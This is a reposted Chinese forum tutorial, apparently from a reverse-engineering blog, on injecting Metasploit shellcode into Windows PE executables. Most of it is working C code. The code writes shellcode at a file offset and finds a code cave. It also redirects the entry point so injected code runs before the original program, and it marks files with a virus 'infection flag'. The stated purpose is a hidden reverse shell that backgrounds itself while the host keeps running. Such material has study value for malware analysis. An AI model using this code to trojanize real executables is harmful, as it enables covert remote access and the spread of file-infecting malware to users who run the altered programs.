2.12 PE结构:实现PE字节注入

饭宝  金牌会员 | 2023-9-11 23:05:34 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 927|帖子 927|积分 2781

本章笔者将介绍一种通过Metasploit生成ShellCode并将其注入到特定PE文件内的Shell注入技术。该技术能够劫持原始PE文件的入口地址,在PE程序运行之前执行ShellCode反弹,执行后挂入后台并继续运行原始程序,实现了一种隐蔽的Shell访问。而我把这种技术叫做字节注入反弹。
字节注入功能调用WritePEShellCode函数,该函数的主要作用是接受用户传入的一个文件位置,并可以将一段通过Metasploit工具生成的有效载荷注入到特定文件偏移位置处。
读者在使用该函数之前需要通过WinHex找到注入位置,我们以如下截图中的30352为例;

接着读者需要自行准备一段ShellCode代码,只保留代码部分去掉头部变量参数,如下所示;

接着我们使用如下这段代码中的WritePEShellCode函数,通过传入指定PE文件路径,指定文件便宜,以及指定的ShellCode文件路径,即可自动将其压缩为一行并在压缩后将代码写出到指定的可执行文件内。
  1. // 将ShellCode写出到PE程序的特定位置
  2. // 参数1: 指定PE路径 参数2: 指定文件中的偏移(十进制) 参数3: 指定ShellCode文件
  3. void WritePEShellCode(const char* FilePath, long FileOffset, const char* ShellCode)
  4. {
  5.   HANDLE hFile = NULL;
  6.   FILE* fpointer = NULL;
  7.   DWORD dwNum = 0;
  8.   int count = 0;
  9.   char shellcode[8192] = { 0 };
  10.   unsigned char save[8192] = { 0 };
  11.   // 打开一段ShellCode代码并处理为一行
  12.   if ((fpointer = fopen(ShellCode, "r")) != NULL)
  13.   {
  14.     char ch = 0;
  15.     for (int x = 0; (ch = fgetc(fpointer)) != EOF;)
  16.     {
  17.       if (ch != L'\n' && ch != L'"' && ch != L'\\' && ch != L'x' && ch != L';')
  18.       {
  19.         shellcode[x++] = ch;
  20.         count++;
  21.       }
  22.     }
  23.   }
  24.   _fcloseall();
  25.   // 将单字节合并为双字节
  26.   for (int x = 0; x < count / 2; x++)
  27.   {
  28.     unsigned int char_in_hex;
  29.     if (shellcode[x] != 0)
  30.     {
  31.       sscanf(shellcode + 2 * x, "%02X", &char_in_hex);
  32.       // 每十六字节换一行输出
  33.       if ((x+1) % 16 == 0)
  34.       {
  35.         printf("0x%02X \n", char_in_hex);
  36.       }
  37.       else
  38.       {
  39.         printf("0x%02X ", char_in_hex);
  40.       }
  41.       save[x] = char_in_hex;
  42.     }
  43.   }
  44.   // 打开PE文件并写出ShellCode到指定位置
  45.   hFile = CreateFile(FilePath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  46.   if (INVALID_HANDLE_VALUE != hFile)
  47.   {
  48.     SetFilePointer(hFile, FileOffset, NULL, FILE_BEGIN);
  49.     bool ref = WriteFile(hFile, save, count/2 , &dwNum, NULL);
  50.     if (true == ref)
  51.     {
  52.       printf("\n\n[*] 已注入 ShellCode 到PE文件 \n[+] 注入起始FOA => 0x%08X \n",FileOffset);
  53.     }
  54.     CloseHandle(hFile);
  55.   }
  56. }
复制代码
我们通过传入WritePEShellCode("d://lyshark.exe", 30352, "d://shellcode.txt");参数,运行后则可将特定文本中的机器码注入到30352的位置处,读者也可以通过使用WinHex跳转到对应位置观察,如下所示;

当然了上述方法注入到PE文件中我们需要手动分析寻找空余块,并在注入成功后还需要自行修正PE文件内的入口地址等,这种方式适合于对PE结构非常熟悉的人可以,但也要花费一些精力去寻找分析,如下代码则是实现了自动化注入功能,该代码中FindSpace()函数用于从代码节的末尾开始搜索,寻找特定长度的空余位置,当找到合适的缝隙后便返回缝隙首地址。
此时dwOep变量内存储的是该程序原始的OEP入口位置,接着将入口地址赋值到*(DWORD *)&shellcode[5]也就是放入到shellcode机器码的第六个位置处,此处将变更为跳转到原始入口的指令集,接着调用memcpy函数将shellcode代码拷贝到新分配的dwAddr内存中,此处的strlen(shellcode) + 3代表的是ShellCode中剩余的\xff\xe0\x00部分,最后将当前EIP指针设置为我们自己的ShellCode所在位置,通过pNtHeader->OptionalHeader.AddressOfEntryPoint赋值设置此变量,至此这个注入器就算实现啦。
  1. #include <stdio.h>
  2. #include <stddef.h>
  3. #include <windows.h>
  4. // \xb8\x90\x90\x90\x90 => mov eax,90909090
  5. // \xff\xe0\x00 => jmp eax
  6. char shellcode[] = "\x90\x90\x90\x90\xb8\x90\x90\x90\x90\xff\xe0\x00";
  7. // 缝隙的搜索从代码节的末尾开始搜索,有利于快速搜索到缝隙
  8. DWORD FindSpace(LPVOID lpBase, PIMAGE_NT_HEADERS pNtHeader)
  9. {
  10.   // 跳过可选头长度的数据
  11.   PIMAGE_SECTION_HEADER pSec = (PIMAGE_SECTION_HEADER)
  12.     (((BYTE *)&(pNtHeader->OptionalHeader) + pNtHeader->FileHeader.SizeOfOptionalHeader));
  13.   // 获取到文件末尾的位置
  14.   DWORD dwAddr = pSec->PointerToRawData + pSec->SizeOfRawData - sizeof(shellcode);
  15.   dwAddr = (DWORD)(BYTE *)lpBase + dwAddr;
  16.   LPVOID lp = malloc(sizeof(shellcode));
  17.   memset(lp, 0, sizeof(shellcode));
  18.   while (dwAddr > pSec->Misc.VirtualSize)
  19.   {
  20.     int nRet = memcmp((LPVOID)dwAddr, lp, sizeof(shellcode));
  21.     if (nRet == 0)
  22.       return dwAddr;
  23.     dwAddr--;
  24.   }
  25.   free(lp);
  26.   return 0;
  27. }
  28. int main(int argc, char* argv[])
  29. {
  30.   HANDLE hFile, hMap = NULL;
  31.   LPVOID lpBase = NULL;
  32.   hFile = CreateFile(L"d://lyshark.exe", GENERIC_READ | GENERIC_WRITE,
  33.     FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
  34.   hMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, 0);
  35.   lpBase = MapViewOfFile(hMap, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
  36.   PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)lpBase;
  37.   PIMAGE_NT_HEADERS pNtHeader = NULL;
  38.   PIMAGE_SECTION_HEADER pSec = NULL;
  39.   IMAGE_SECTION_HEADER imgSec = { 0 };
  40.   if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
  41.   {
  42.     printf("[-] 文件非可执行文件 \n");
  43.     return -1;
  44.   }
  45.   pNtHeader = (PIMAGE_NT_HEADERS)((BYTE*)lpBase + pDosHeader->e_lfanew);
  46.   // 查找空余字节
  47.   DWORD dwAddr = FindSpace(lpBase, pNtHeader);
  48.   printf("[*] 找到 %d 字节 | 起始地址: %X \n", sizeof(shellcode), dwAddr);
  49.   // 获取到原入口地址
  50.   DWORD dwOep = pNtHeader->OptionalHeader.ImageBase + pNtHeader->OptionalHeader.AddressOfEntryPoint;
  51.   // \xb8 => 填充的就是原始程序的OEP
  52.   *(DWORD *)&shellcode[5] = dwOep;
  53.   printf("[-] 原始入口地址: 0x%08X \n", dwOep);
  54.   // 将shellcode 拷贝到dwAddr内存空间里,拷贝长度strlen(shellcode) + 3
  55.   memcpy((char *)dwAddr, shellcode, strlen(shellcode) + 3);
  56.   dwAddr = dwAddr - (DWORD)(BYTE *)lpBase;
  57.   printf("[-] 拷贝内存长度: 0x%08X \n", dwAddr);
  58.   // 将新的入口地址,赋值给原始程序的地址上
  59.   pNtHeader->OptionalHeader.AddressOfEntryPoint = dwAddr;
  60.   printf("[+] 修正新入口地址: 0x%08X \n", pNtHeader->OptionalHeader.ImageBase + dwAddr);
  61.   UnmapViewOfFile(lpBase);
  62.   CloseHandle(hMap);
  63.   CloseHandle(hFile);
  64.   system("pause");
  65.   return 0;
  66. }
复制代码
读者可自行编译并运行上述代码,当运行结束后会将ShellCode全局变量中的指令集,写入到lyshark.exe程序内,并修正当前程序的OEP入口处,此时读者可运行lyshark.exe程序,看是否能够正常执行起来,如下图所示;

此时读者可自行打开x64dbg调试器,观察此时的程序入口处已经变成了0x47BFF3执行到最后则通过jmp eax跳转到了原始的程序入口处继续执行,这也就是空字节注入的功能,当读者自己将nop指令替换为任意特殊的汇编指令时,也就实现了一款注入Shell版本的软件。

当我们对特定的程序插入Shell后,则还需要对该程序增加一个标志,在PE结构中有许多地方可以写入这个标志,例如DOS头部存在一个e_cblp变量,通过向该变量写入一个标志,当需要判断是否被感染时读取此处并检查是否存在特定值即可,如下代码则是一个检查实现方式。
  1. #include <stdio.h>
  2. #include <stddef.h>
  3. #include <windows.h>
  4. #define VIRUSFLAGS 0xCCCC
  5. // 向指定文件写入感染标志
  6. BOOL WriteSig(DWORD dwAddr, DWORD dwSig, HANDLE hFile)
  7. {
  8.   DWORD dwNum = 0;
  9.   SetFilePointer(hFile, dwAddr, 0, FILE_BEGIN);
  10.   WriteFile(hFile, &dwSig, sizeof(DWORD), &dwNum, NULL);
  11.   return TRUE;
  12. }
  13. // 检查文件是否被感染
  14. BOOL CheckSig(DWORD dwAddr, DWORD dwSig, HANDLE hFile)
  15. {
  16.   DWORD dwSigNum = 0;
  17.   DWORD dwNum = 0;
  18.   SetFilePointer(hFile, dwAddr, 0, FILE_BEGIN);
  19.   ReadFile(hFile, &dwSigNum, sizeof(DWORD), &dwNum, NULL);
  20.   if (dwSigNum == dwSig)
  21.     return TRUE;
  22.   return FALSE;
  23. }
  24. int main(int argc, char* argv[])
  25. {
  26.   HANDLE hFile, hMap = NULL;
  27.   LPVOID lpBase = NULL;
  28.   hFile = CreateFileA("d://lyshark.exe", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
  29.   hMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, 0);
  30.   lpBase = MapViewOfFile(hMap, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
  31.   PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)lpBase;
  32.   PIMAGE_NT_HEADERS pNtHeader = NULL;
  33.   PIMAGE_SECTION_HEADER pSec = NULL;
  34.   IMAGE_SECTION_HEADER imgSec = { 0 };
  35.   if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
  36.   {
  37.     printf("[-] 文件非可执行文件 \n");
  38.     return -1;
  39.   }
  40.   pNtHeader = (PIMAGE_NT_HEADERS)((BYTE*)lpBase + pDosHeader->e_lfanew);
  41.   // 写入感染标志
  42.   WriteSig(offsetof(IMAGE_DOS_HEADER, e_cblp), VIRUSFLAGS, hFile);
  43.   // 返回真说明感染过
  44.   if (CheckSig(offsetof(IMAGE_DOS_HEADER, e_cblp), VIRUSFLAGS, hFile))
  45.   {
  46.     printf("[+] 文件已被感染,无法重复感染. \n");
  47.   }
  48.   system("pause");
  49.   return 0;
  50. }
复制代码
由于e_cblp是第二个字段,所以在填充后我们打开WinHex就可以看到变化,如下图所示;

本文作者: 王瑞
本文链接: https://www.lyshark.com/post/240d333e.html
版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

饭宝

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表